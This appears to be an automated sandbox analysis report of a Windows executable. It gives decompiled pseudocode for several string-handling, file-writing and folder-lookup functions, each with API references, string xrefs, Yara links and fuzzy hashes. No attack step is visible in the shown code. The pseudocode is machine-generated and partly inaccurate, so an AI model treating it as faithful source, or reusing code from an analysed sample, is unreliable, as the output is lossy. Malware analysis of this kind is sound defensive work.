								_t203 =  *0x417064; // 0x27905f0
								E0040DFC0(_t203);
								E0040DFC0(_v48);
								_t189 = L"\r\n";
								E0040DFC0(_t189);
								E0040DE60(0x417088, _t100);
							} else {
								_t205 =  *0x417048; // 0x2799440
								_t108 = E0040DE20();
								_t206 = _t205;
								_push(_t108);
								E0040DFC0(_t206);
								_t207 =  *0x417064; // 0x27905f0
								E0040DFC0(_t207);
								_t111 = E0040DE20();
								_t208 = _t207;
								_push(_t111);
								E00405D40(_v8, 0x416032, E0040DE20());
								E0040DE60( &_a4, _t208);
								E0040A665(_v4);
								_t178 =  *0x41707c; // 0x0
								__eflags = _t178 - 1;
								if(_t178 == 1) {
									_push(E00405980(_a20));
									E0040A6E5(_a20);
								}
								_push(_a24);
								E00403C3E();
								_t210 =  *0x417088; // 0x279a268
								_t120 = E0040DE20();
								_t211 = _t210;
								E0040DFC0(_t211);
								E0040DFC0(_a16);
								_t189 = L"\r\n";
								E0040DFC0(_t189);
								E0040DE60(0x417088, _t120);
							}
						} else {
							_t129 = E00405980(_a4);
							_a8 = _t129;
							_v12 =  &(_v12[1]);
						}
						_t169 = _a12 + 1;
						_a12 = _a12 + 1;
					}
					_t74 = _v8;
				} else {
					_t183 =  *0x417074; // 0x0
					if(_t183 != 1) {
						L6:
						_t142 = 0;
						__eflags = 0;
					} else {
						_t183 =  *0x417060; // 0x0
						if(_t183 == 1) {
							goto L6;
						} else {
							_t142 = 1;
						}
					}
					_t74 = _t142;
					if(_t142 != 0) {
						_v20 = E00405760( *0x417088, 0x416022);
						_v16 = 1;
						while(_v12 >= _v8) {
							_t151 = E0040DE20();
							_t218 = _t189;
							_push(_t151);
							_t152 = E0040DE20();
							_t189 = _t218;
							_t3 =  &_v8; // 0x416062
							E004057F0(_t183, _t223, _t224,  *0x417088,  *_t3, L"\r\n", _t152);
							_push( &_v20);
							E0040DE60();
							_t157 = E0040249B(_v28);
							_t239 = _t157;
							if(_t157 != 0) {
								_push(_t189);
								_t159 = E0040DE20();
								E00402BFA(_t239, _v4);
								_t7 =  &_v4; // 0x416062
								E0040DE60(_t7, _t159);
								_t8 =  &_v8; // 0x416062
								_push( *_t8);
								_t163 = E0040DE20();
								_pop(_t221);
								E0040DFC0(_t221);
								_t9 =  &_v16; // 0x416062
								E0040DFC0( *_t9);
								_t189 = L"\r\n";
								E0040DFC0(_t189);
								E0040DE60( &_v20, _t163);
							}
							_t11 =  &_v8;
							 *_t11 = _v8 + 1;
							if( *_t11 >= 0) {
								continue;
							}
							break;
						}
						_a4 = E00405700(_a4);
						WriteFile( *0x417034, _v0, E00409B00(_a4),  &_a8, 0);
						E00409B20(_v0);
						_t74 = E00405068(0x417088, 0x416020);
					}
				}
				return E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(_t74, _v4), _a24), _v4), _a12), _v16);
			}

0x00401500
0x00401500
0x00401502
0x00401507
0x00401507
0x0040150a
0x00401511
0x00401511
0x00401514
0x00401519
0x00401522
0x0040165a
0x00401664
0x0040166c
0x0040166d
0x00401672
0x00401673
0x00401675
0x0040167a
0x0040168c
0x00401695
0x00401696
0x004016aa
0x004016ae
0x004016b3
0x004016b6
0x004016bb
0x004016bc
0x004016be
0x004016c3
0x004016d4
0x004016dd
0x004016de
0x004016e4
0x004016e9
0x004016ea
0x00401702
0x0040170c
0x0040170c
0x00401715
0x00401717
0x0040171c
0x00000000
0x00000000
0x0040172d
0x0040172e
0x00401732
0x00401734
0x00401762
0x00401767
0x00401768
0x00401769
0x00401770
0x0040177a
0x0040177f
0x00401789
0x00401792
0x00401797
0x00401852
0x00401857
0x00401858
0x0040186b
0x00401875
0x0040187e
0x0040187f
0x00401884
0x00401887
0x0040189b
0x0040189f
0x004018ad
0x004018b2
0x004018bb
0x004018bd
0x004018be
0x004018c1
0x004018c8
0x004018cd
0x004018d0
0x004018d5
0x004018dc
0x004018e1
0x004018e8
0x004018f2
0x004018f7
0x004018fd
0x00401909
0x0040179d
0x0040179d
0x004017a4
0x004017a9
0x004017aa
0x004017ac
0x004017b1
0x004017b8
0x004017be
0x004017c3
0x004017c4
0x004017d7
0x004017e2
0x004017eb
0x004017f0
0x004017f6
0x004017f9
0x00401804
0x00401809
0x00401809
0x0040180e
0x00401812
0x00401817
0x0040181e
0x00401823
0x00401826
0x00401830
0x00401835
0x0040183b
0x00401847
0x00401847
0x00401736
0x0040174f
0x00401750
0x00401758
0x00401758
0x00401916
0x00401917
0x00401917
0x00401920
0x00401528
0x00401528
0x00401531
0x00401545
0x00401545
0x00401545
0x00401533
0x00401533
0x0040153c
0x00000000
0x0040153e
0x0040153e
0x0040153e
0x0040153c
0x00401547
0x00401549
0x00401560
0x00401563
0x0040156d
0x0040157b
0x00401580
0x00401581
0x00401583
0x00401588
0x00401590
0x0040159a
0x004015a3
0x004015a4
0x004015ad
0x004015b2
0x004015b4
0x004015b6
0x004015b7
0x004015c2
0x004015c7
0x004015cc
0x004015d1
0x004015d5
0x004015d6
0x004015db
0x004015de
0x004015e3
0x004015e8
0x004015ed
0x004015f3
0x004015fd
0x004015fd
0x00401602
0x00401602
0x00401606
0x00000000
0x00000000
0x00000000
0x00401606
0x00401615
0x00401637
0x00401640
0x00401650
0x00401650
0x00401655
0x0040195a

APIs

WriteFile.KERNEL32(?,00000000,?,?,00000000,?), ref: 00401637

Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B

Part of subcall function 004057F0: wcsncmp.MSVCRT(00000000,?,?,?,?,-0000012C,?,?,004022A6,00000000,00000002,00000000,00000000,00416020,00000001,00000000), ref: 00405853
Part of subcall function 004057F0: memmove.MSVCRT ref: 004058E1
Part of subcall function 004057F0: wcsncpy.MSVCRT ref: 004058F9

Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02790000,00000000,?), ref: 0040DE99

Part of subcall function 00405920: wcsstr.MSVCRT ref: 00405961

Part of subcall function 0040DE60: RtlReAllocateHeap.NTDLL(02790000,00000000,?,?), ref: 0040DEBC

Part of subcall function 0040A665: wcsncpy.MSVCRT ref: 0040A683
Part of subcall function 0040A665: wcslen.MSVCRT ref: 0040A695
Part of subcall function 0040A665: CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040A6D5

Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7

Strings

.`A, xrefs: 004016C5
.`A, xrefs: 004016F3
b`A, xrefs: 00401835
b`A, xrefs: 004015ED
2`A, xrefs: 00401784
2`A, xrefs: 004017CD
b`A, xrefs: 0040158A
.`A, xrefs: 0040169B
b`A, xrefs: 00401590, 004015C7, 004015D1, 004015E3, 004015CB, 004015D5, 004015DD, 004015E7
2`A, xrefs: 00401861
b`A, xrefs: 004018F7
*`A, xrefs: 0040167C
`A, xrefs: 00401645
"`A, xrefs: 0040154F

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateErrorHeapLastValuewcslenwcsncpy$CreateDirectoryFileWritememmovewcsncmpwcsstr
String ID: `A$"`A$*`A$.`A$.`A$.`A$2`A$2`A$2`A$b`A$b`A$b`A$b`A$b`A
API String ID: 4088865958-588743708
Opcode ID: 6dbfea62690b127eaf24f4378f446ed451afde7462f6d2ec7042ae71204f504e
Instruction ID: ee34c1dc759ec8b9afbcc9474be159e29596370e2cc13c49719891b07a5b0ef3
Opcode Fuzzy Hash: 6dbfea62690b127eaf24f4378f446ed451afde7462f6d2ec7042ae71204f504e
Instruction Fuzzy Hash: 53B13FB5504701AED600FBA1DD8197F76A9EB98708F10C83FB044BA1E2CA3CDD599B6D

Uniqueness

Uniqueness Score: -1.00%

Function 004092F5, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 116
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E004092F5(void* __esi, intOrPtr _a4, wchar_t* _a8, intOrPtr _a12) {
				short _v2;
				long _v520;
				wchar_t* _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				void _v552;
				_Unknown_base(*)()* _v556;
				_Unknown_base(*)()* _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				short* _t39;
				_Unknown_base(*)()* _t42;
				signed int _t47;
				wchar_t* _t56;
				int _t59;
				short _t60;
				wchar_t* _t65;
				int _t66;
				intOrPtr _t67;
				void* _t68;
				intOrPtr _t70;
				wchar_t* _t72;
				struct HINSTANCE__* _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t68 = __esi;
				_t74 =  &_v560;
				_t66 = 0;
				_t77 =  *0x4170e0 - _t66; // 0x0
				if(_t77 == 0) {
					 *0x4170e0 = 1;
					__imp__CoInitialize(0);
				}
				memset( &_v552, _t66, 0x20);
				_t75 = _t74 + 0xc;
				_t73 = LoadLibraryW(L"SHELL32.DLL");
				if(_t73 == 0) {
					L12:
					_t39 = E0040E200(0x104, _a12);
					_t64 = 0;
					 *_t39 = 0;
					goto L13;
				} else {
					_push(_t68);
					_v560 = GetProcAddress(_t73, "SHBrowseForFolderW");
					_t42 = GetProcAddress(_t73, "SHGetPathFromIDListW");
					_t65 = _a8;
					_v556 = _t42;
					if(_t65 == 0) {
						_t65 = 0x412024;
					}
					wcsncpy( &_v520, _t65, 0x103);
					_v2 = 0;
					_t47 = wcslen( &_v520);
					_t76 = _t75 + 0x10;
					_t64 = 0x5c;
					if(_t47 > 3 &&  *((intOrPtr*)(_t76 + 0x36 + _t47 * 2)) == _t64) {
						_t64 = 0;
						 *((short*)(_t76 + 0x36 + _t47 * 2)) = 0;
					}
					_v540 = _a4;
					_v552 = E00409471(_t64);
					_v536 = 0x50;
					_v532 = E004092B1;
					_v528 =  &_v520;
					E00409528(1);
					_t70 = _v564( &_v556);
					_v568 = _t70;
					E00409528(_t66);
					if(_t70 != 0) {
						_t56 = E0040E200(0x104, _a8);
						_t67 = _v572;
						_t72 = _t56;
						 *_t72 = 0;
						_v568(_t67, _t72);
						__imp__CoTaskMemFree();
						_t59 = wcslen(_t72);
						_t64 = _t67;
						_t66 = _t59;
						_t60 = 0x5c;
						if( *((intOrPtr*)(_t72 + _t66 * 2 - 2)) != _t60) {
							 *((short*)(_t72 + _t66 * 2)) = _t60;
							 *((short*)(_t72 + 2 + _t66 * 2)) = 0;
							_t66 = _t66 + 1;
						}
					}
					FreeLibrary(_t73);
					if(_t66 != 0) {
						L13:
						return E0040E350(_t64, 0x104 - _t66);
					} else {
						goto L12;
					}
				}
			}

0x004092f5
0x004092f5
0x004092fe
0x00409300
0x00409306
0x00409309
0x00409313
0x00409313
0x00409321
0x00409326
0x00409334
0x0040933d
0x0040944b
0x00409453
0x00409458
0x0040945a
0x00000000
0x00409343
0x00409343
0x00409358
0x0040935c
0x0040935e
0x00409365
0x0040936b
0x0040936d
0x0040936d
0x0040937d
0x00409384
0x00409391
0x00409396
0x0040939b
0x0040939f
0x004093a8
0x004093aa
0x004093aa
0x004093b6
0x004093bf
0x004093c9
0x004093d1
0x004093d9
0x004093dd
0x004093eb
0x004093ee
0x004093f2
0x004093f9
0x00409403
0x00409408
0x0040940c
0x00409412
0x00409415
0x0040941a
0x00409421
0x00409426
0x00409427
0x0040942b
0x00409431
0x00409433
0x00409439
0x0040943e
0x0040943e
0x00409431
0x00409440
0x00409449
0x0040945d
0x0040946e
0x00000000
0x00000000
0x00000000
0x00409449

APIs

CoInitialize.OLE32(00000000), ref: 00409313

Part of subcall function 0040E350: TlsGetValue.KERNEL32(0000001B,\\?\,?,0040968D,00000104,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 0040E35A

memset.MSVCRT ref: 00409321
LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040932E
GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 00409350
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 0040935C
wcsncpy.MSVCRT ref: 0040937D
wcslen.MSVCRT ref: 00409391
CoTaskMemFree.OLE32(?), ref: 0040941A
wcslen.MSVCRT ref: 00409421
FreeLibrary.KERNEL32(00000000,00000000), ref: 00409440

Strings

SHGetPathFromIDListW, xrefs: 00409352
SHBrowseForFolderW, xrefs: 0040934A
$ A, xrefs: 0040936D
P, xrefs: 004093C9
SHELL32.DLL, xrefs: 00409329

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskValuememsetwcsncpy
String ID: $ A$P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
API String ID: 4193992262-128120239
Opcode ID: d5588915c1d38e9502f5e4006468ea80d97d5df85f2ef6855433996e1c219f47
Instruction ID: 1392e4e60208b56ee8b10dacf4ca704cd47aacd570b2ed0dd50540f2d7556013
Opcode Fuzzy Hash: d5588915c1d38e9502f5e4006468ea80d97d5df85f2ef6855433996e1c219f47
Instruction Fuzzy Hash: 81418571504300AAC720EF759C49A9FBBE8EF88744F00483FF945E3292D779D9458B6A

Uniqueness

Uniqueness Score: -1.00%

Function 004062B0, Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 275
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004062B0() {
				signed int _t88;
				long _t89;
				signed int _t91;
				void* _t92;
				wchar_t* _t93;
				void* _t94;
				signed short* _t98;
				void _t99;
				int _t101;
				void* _t103;
				signed int _t105;
				wchar_t* _t106;
				void* _t107;
				wchar_t* _t109;
				signed int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				signed int _t116;
				wchar_t* _t117;
				void* _t118;
				wchar_t* _t119;
				wchar_t* _t120;
				signed int _t121;
				signed short* _t122;
				void* _t123;
				signed int _t126;
				void* _t127;
				signed char _t128;
				void* _t131;
				signed int _t132;
				long* _t134;
				void* _t135;
				wchar_t* _t141;
				void* _t142;
				signed short* _t143;
				wchar_t* _t146;
				wchar_t* _t147;
				signed int _t149;
				signed int _t150;
				void* _t151;

				_t150 = 0;
				if( *(_t151 + 0x34) == 0) {
					 *(_t151 + 0x34) = 0x412024;
				}
				_t117 =  *(_t151 + 0x38);
				if(_t117 == 0) {
					_t117 = 0x412024;
					 *(_t151 + 0x38) = 0x412024;
				}
				if( *(_t151 + 0x3c) == _t150) {
					 *(_t151 + 0x3c) = 0x412024;
				}
				_t128 =  *(_t151 + 0x40);
				_t120 = 0x40530d;
				_t88 = _t128 & 0x00000001;
				 *(_t151 + 0x14) = _t88;
				if(_t88 == 0) {
					_t120 = L004052F5;
				}
				 *(_t151 + 0x40) = _t120;
				if( *(_t151 + 0x44) <= _t150) {
					 *(_t151 + 0x44) = 1;
				}
				_t147 = _t117;
				_t134 =  &(_t147[0]);
				do {
					_t89 =  *_t147;
					_t147 =  &(_t147[0]);
				} while (_t89 != 0);
				_t135 =  *(_t151 + 0x3c);
				_t149 = _t147 - _t134 >> 1;
				 *(_t151 + 0x10) = _t135 + 2;
				do {
					_t91 =  *_t135;
					_t135 = _t135 + 2;
				} while (_t91 != 0);
				_t137 = _t135 -  *(_t151 + 0x10) >> 1;
				 *(_t151 + 0x10) = _t135 -  *(_t151 + 0x10) >> 1;
				if((_t128 & 0x00000002) == 0) {
					_t92 = E0040E180(_t120,  *(_t151 + 0x34));
					 *(_t151 + 0x24) = _t92;
					if(_t92 != 0) {
						_push( *(_t151 + 0x34));
						L00405313();
						_t151 = _t151 + 4;
						 *(_t151 + 0x34) = _t92;
					}
					_t93 = E0040E180(_t120, _t117);
					 *(_t151 + 0x28) = _t93;
					if(_t93 != 0) {
						_push(_t117);
						L00405313();
						_t117 = _t93;
						_t151 = _t151 + 4;
						 *(_t151 + 0x38) = _t117;
					}
					_t94 = E0040E180(_t120,  *(_t151 + 0x3c));
					 *(_t151 + 0x2c) = _t94;
					if(_t94 != 0) {
						_push( *(_t151 + 0x3c));
						L00405313();
						_t151 = _t151 + 4;
						 *(_t151 + 0x3c) = _t94;
					}
					_t121 =  *(_t151 + 0x44) +  *(_t151 + 0x44);
					 *(_t151 + 0x1c) = _t121;
					_t98 =  *(_t151 + 0x34) + 0xfffffffe + _t121;
					 *(_t151 + 0x20) = _t98;
					_t122 = _t98;
					 *(_t151 + 0x18) = _t122;
					if( *(_t151 + 0x48) != 0) {
						_t111 =  *_t122 & 0x0000ffff;
						if(_t111 != 0) {
							_t143 = _t122;
							do {
								if( *(_t151 + 0x14) != 0) {
									_t112 =  *((intOrPtr*)(_t151 + 0x4c))(_t143, _t117, _t149);
									_t151 = _t151 + 0xc;
									if(_t112 != 0) {
										goto L38;
									} else {
										goto L48;
									}
									goto L61;
								} else {
									if(_t111 !=  *_t117) {
										L38:
										_t143 =  &(_t143[1]);
										goto L39;
									} else {
										_t113 =  *((intOrPtr*)(_t151 + 0x4c))(_t143, _t117, _t149);
										_t151 = _t151 + 0xc;
										if(_t113 == 0) {
											L48:
											_t132 =  *(_t151 + 0x48);
											_t143 =  &(_t143[_t149]);
											_t150 = _t150 + 1;
											if(_t132 == 0xffffffff) {
												goto L39;
											} else {
												if(_t132 <= _t150) {
													break;
												} else {
													goto L39;
												}
											}
											L61:
											if( *(_t151 + 0x24) != 0) {
												free(_t118);
												_t151 = _t151 + 4;
											}
											if( *(_t151 + 0x28) != 0) {
												free( *(_t151 + 0x38));
												_t151 = _t151 + 4;
											}
											if( *(_t151 + 0x2c) != 0) {
												free( *(_t151 + 0x3c));
												return _t91;
											}
											goto L67;
										} else {
											goto L38;
										}
									}
								}
								break;
								L39:
								_t111 =  *_t143 & 0x0000ffff;
							} while (_t111 != 0);
							_t137 =  *(_t151 + 0x10);
						}
					}
					_t118 =  *(_t151 + 0x34);
					_t123 = _t118;
					_t131 = _t123 + 2;
					do {
						_t99 =  *_t123;
						_t123 = _t123 + 2;
					} while (_t99 != 0);
					_t141 = E0040E200((_t137 - _t149) * _t150 + (_t123 - _t131 >> 1),  *((intOrPtr*)(_t151 + 0x4c)));
					if(_t150 != 0) {
						_t101 =  *(_t151 + 0x44);
						if(_t101 > 1) {
							wcsncpy(_t141,  *(_t151 + 0x38), _t101);
							_t109 =  *(_t151 + 0x28);
							_t151 = _t151 + 0xc;
							_t118 =  *(_t151 + 0x20);
							_t141 = _t141 +  &(_t109[0]);
						}
						_t126 =  *_t118 & 0x0000ffff;
						while(_t126 != 0) {
							if(_t150 <= 0) {
								L58:
								 *_t141 =  *_t118;
								_t141 =  &(_t141[0]);
								_t118 = _t118 + 2;
							} else {
								if( *(_t151 + 0x14) != 0) {
									_t103 =  *((intOrPtr*)(_t151 + 0x4c))(_t118,  *(_t151 + 0x3c), _t149);
									_t151 = _t151 + 0xc;
									if(_t103 != 0) {
										goto L58;
									} else {
										goto L69;
									}
									goto L70;
								} else {
									_t106 =  *(_t151 + 0x38);
									if(_t126 !=  *_t106) {
										goto L58;
									} else {
										_t107 =  *((intOrPtr*)(_t151 + 0x4c))(_t118, _t106, _t149);
										_t151 = _t151 + 0xc;
										if(_t107 == 0) {
											L69:
											wcsncpy(_t141,  *(_t151 + 0x40),  *(_t151 + 0x10));
											_t105 =  *(_t151 + 0x1c);
											_t118 = _t118 + _t149 * 2;
											_t151 = _t151 + 0xc;
											_t150 = _t150 - 1;
											_t141 = _t141 + _t105 * 2;
										} else {
											goto L58;
										}
									}
								}
							}
							_t126 =  *_t118 & 0x0000ffff;
						}
						_t118 =  *(_t151 + 0x34);
						_t91 = 0;
						 *_t141 = 0;
					} else {
						_t127 = _t118;
						_t142 = _t141 - _t118;
						do {
							_t91 =  *_t127 & 0x0000ffff;
							_t127 = _t127 + 2;
							 *(_t142 + _t127 - 2) = _t91;
						} while (_t91 != 0);
					}
					goto L61;
				} else {
					if(_t149 == 0) {
						L67:
						return _t91;
					} else {
						_t91 =  *(_t151 + 0x48);
						if(_t91 != 0) {
							_t146 =  *(_t151 + 0x34) + ( *(_t151 + 0x44) - 1) * 2;
							_t119 = _t146;
							if( *_t119 != _t150) {
								while(_t91 == 0xffffffff || _t91 > _t150) {
									_t114 =  *_t120(_t146,  *(_t151 + 0x3c), _t149);
									_t151 = _t151 + 0xc;
									if(_t114 != 0) {
										_t146 =  &(_t146[0]);
										_t119 =  &(_t119[0]);
									} else {
										wcsncpy(_t146,  *(_t151 + 0x40),  *(_t151 + 0x10));
										_t116 =  *(_t151 + 0x1c);
										_t119 = _t119 + _t149 * 2;
										_t151 = _t151 + 0xc;
										_t150 = _t150 + 1;
										_t146 = _t146 + _t116 * 2;
									}
									_t91 =  *(_t151 + 0x48);
									_t120 =  *(_t151 + 0x40);
									if( *_t119 != 0) {
										continue;
									} else {
										return _t91;
									}
									goto L70;
								}
							}
						}
						goto L67;
					}
				}
				L70:
			}

0x004062b5
0x004062bd
0x004062bf
0x004062bf
0x004062c7
0x004062cd
0x004062cf
0x004062d4
0x004062d4
0x004062dc
0x004062de
0x004062de
0x004062e6
0x004062ea
0x004062f1
0x004062f4
0x004062f8
0x004062fa
0x004062fa
0x004062ff
0x00406307
0x00406309
0x00406309
0x00406311
0x00406313
0x00406316
0x00406316
0x00406319
0x0040631c
0x00406323
0x00406327
0x0040632c
0x00406330
0x00406330
0x00406333
0x00406336
0x0040633f
0x00406341
0x00406348
0x004063dd
0x004063e2
0x004063e8
0x004063ea
0x004063ee
0x004063f3
0x004063f6
0x004063f6
0x004063fb
0x00406400
0x00406406
0x00406408
0x00406409
0x0040640e
0x00406410
0x00406413
0x00406413
0x0040641b
0x00406420
0x00406426
0x00406428
0x0040642c
0x00406431
0x00406434
0x00406434
0x00406440
0x0040644a
0x0040644e
0x00406450
0x00406454
0x00406456
0x0040645c
0x0040645e
0x00406464
0x00406466
0x00406468
0x0040646d
0x004064e8
0x004064ec
0x004064f1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040646f
0x00406472
0x00406482
0x00406482
0x00000000
0x00406474
0x00406477
0x0040647b
0x00406480
0x004064f3
0x004064f3
0x004064f7
0x004064fa
0x004064fe
0x00000000
0x00406500
0x00406502
0x00000000
0x00406504
0x00000000
0x00406504
0x00406502
0x00406574
0x00406579
0x0040657c
0x00406581
0x00406581
0x00406589
0x0040658f
0x00406594
0x00406594
0x0040659c
0x004065a2
0x00000000
0x004065a7
0x00000000
0x00000000
0x00000000
0x00000000
0x00406480
0x00406472
0x00000000
0x00406485
0x00406485
0x00406488
0x0040648d
0x0040648d
0x00406464
0x00406491
0x00406495
0x00406497
0x004064a0
0x004064a0
0x004064a3
0x004064a6
0x004064c0
0x004064c4
0x00406509
0x00406510
0x00406518
0x0040651d
0x00406521
0x00406524
0x0040652b
0x0040652b
0x0040652d
0x00406533
0x00406537
0x00406557
0x0040655a
0x0040655d
0x00406560
0x00406539
0x0040653e
0x004065ba
0x004065be
0x004065c3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406540
0x00406540
0x00406547
0x00000000
0x00406549
0x0040654c
0x00406550
0x00406555
0x004065c5
0x004065ce
0x004065d3
0x004065d7
0x004065da
0x004065dd
0x004065de
0x00000000
0x00000000
0x00000000
0x00406555
0x00406547
0x0040653e
0x00406563
0x00406566
0x0040656b
0x0040656f
0x00406571
0x004064c6
0x004064c6
0x004064c8
0x004064d0
0x004064d0
0x004064d3
0x004064d6
0x004064db
0x004064e0
0x00000000
0x0040634e
0x00406350
0x004065b1
0x004065b1
0x00406356
0x00406356
0x0040635c
0x0040636b
0x0040636e
0x00406373
0x00406380
0x00406393
0x00406395
0x0040639a
0x004063ba
0x004063bd
0x0040639c
0x004063a5
0x004063aa
0x004063ae
0x004063b1
0x004063b4
0x004063b5
0x004063b5
0x004063c4
0x004063c8
0x004063cc
0x00000000
0x004063d5
0x004063d5
0x004063d5
0x00000000
0x004063cc
0x00406380
0x00406373
0x00000000
0x0040635c
0x00406350
0x00000000

APIs

wcsncpy.MSVCRT ref: 004063A5

Part of subcall function 0040E180: TlsGetValue.KERNEL32(0000001B,?,?,00405E65,00001000,00001000,?,?,00001000,00402FE6,00000000,00000008,00000001,00000000,00000000,00000000), ref: 0040E18A

_wcsdup.MSVCRT ref: 004063EE
_wcsdup.MSVCRT ref: 00406409
_wcsdup.MSVCRT ref: 0040642C
wcsncpy.MSVCRT ref: 00406518
free.MSVCRT(?), ref: 0040657C
free.MSVCRT(?), ref: 0040658F
free.MSVCRT(?), ref: 004065A2
wcsncpy.MSVCRT ref: 004065CE

Strings

$ A, xrefs: 004062DE
$ A, xrefs: 004062BF
$ A, xrefs: 004062CF

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcsdupfreewcsncpy$Value
String ID: $ A$$ A$$ A
API String ID: 1554701960-2077024048
Opcode ID: 81cbbaf9a2bb25f669f5b054791e3fa14d7c6e9058cb5600c4bd8963ee11386a
Instruction ID: ef8ff848e519ff80595976f88fda9aa54c27a9e0628953f57c1371388918df2b
Opcode Fuzzy Hash: 81cbbaf9a2bb25f669f5b054791e3fa14d7c6e9058cb5600c4bd8963ee11386a
Instruction Fuzzy Hash: 70A1BD71504301AFCB209F18C88166BB7B1EF94348F05093EFD86A7395E77AD925CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A7DA, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 91
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040A7DA(void* __eflags, char _a8) {
				signed int _v4;
				wchar_t* _v8;
				signed int _t11;
				int _t14;
				_Unknown_base(*)()* _t18;
				int _t23;
				struct HINSTANCE__* _t24;
				wchar_t* _t26;
				int _t27;
				void* _t31;

				_t27 = 0;
				_t26 = E0040E200(0x104, _a8);
				_t11 = _v4;
				if(_t11 != 2) {
					if(_t11 > 9) {
						L20:
						E0040E350(_t25, 0x104 - _t27);
						 *((short*)(_t26 + _t27 * 2)) = 0;
						return 0;
					}
					switch( *((intOrPtr*)(_t11 * 4 +  &M0040A8D2))) {
						case 0:
							L18:
							_t14 = E0040A90C(_t28, _t26);
							L19:
							_t27 = _t14;
							goto L20;
						case 1:
							_push(0x26);
							goto L17;
						case 2:
							goto L20;
						case 3:
							_push(5);
							goto L17;
						case 4:
							_push(0x1a);
							goto L17;
						case 5:
							_push(0x23);
							goto L17;
						case 6:
							_push(0xe);
							goto L17;
						case 7:
							_push(0xd);
							goto L17;
						case 8:
							_push(0x27);
							goto L17;
						case 9:
							_push(0x2e);
							L17:
							_pop(_t28);
							goto L18;
					}
				}
				_t24 = LoadLibraryW(L"Shell32.DLL");
				if(_t24 == 0) {
					L6:
					E0040A90C(0x28, _t26);
					wcscat(_t26, L"Downloads\\");
					_t14 = wcslen(_t26);
					goto L19;
				}
				_t18 = GetProcAddress(_t24, "SHGetKnownFolderPath");
				 *0x4170f8 = _t18;
				if(_t18 != 0) {
					_t25 =  &_a8;
					_push( &_a8);
					_push(0);
					_push(0);
					_push(0x41611c);
					if( *_t18() == 0) {
						wcscpy(_t26, _v8);
						wcscat(_t26, "\\");
						_t23 = wcslen(_t26);
						_t31 = _t31 + 0x14;
						_t27 = _t23;
						__imp__CoTaskMemFree(_v8);
					}
				}
				FreeLibrary(_t24);
				if(_t27 != 0) {
					goto L20;
				} else {
					goto L6;
				}
			}

0x0040a7e7
0x0040a7ef
0x0040a7f1
0x0040a7f8
0x0040a88c
0x0040a8bd
0x0040a8c0
0x0040a8c7
0x0040a8cf
0x0040a8cf
0x0040a88e
0x00000000
0x0040a8b4
0x0040a8b6
0x0040a8bb
0x0040a8bb
0x00000000
0x00000000
0x0040a895
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a899
0x00000000
0x00000000
0x0040a89d
0x00000000
0x00000000
0x0040a8a1
0x00000000
0x00000000
0x0040a8a5
0x00000000
0x00000000
0x0040a8a9
0x00000000
0x00000000
0x0040a8ad
0x00000000
0x00000000
0x0040a8b1
0x0040a8b3
0x0040a8b3
0x00000000
0x00000000
0x0040a88e
0x0040a809
0x0040a80d
0x0040a86b
0x0040a86e
0x0040a879
0x0040a87f
0x00000000
0x0040a884
0x0040a815
0x0040a81b
0x0040a822
0x0040a824
0x0040a828
0x0040a829
0x0040a82a
0x0040a82b
0x0040a834
0x0040a83b
0x0040a846
0x0040a84c
0x0040a851
0x0040a854
0x0040a85a
0x0040a85a
0x0040a834
0x0040a861
0x0040a869
0x00000000
0x00000000
0x00000000
0x00000000

APIs

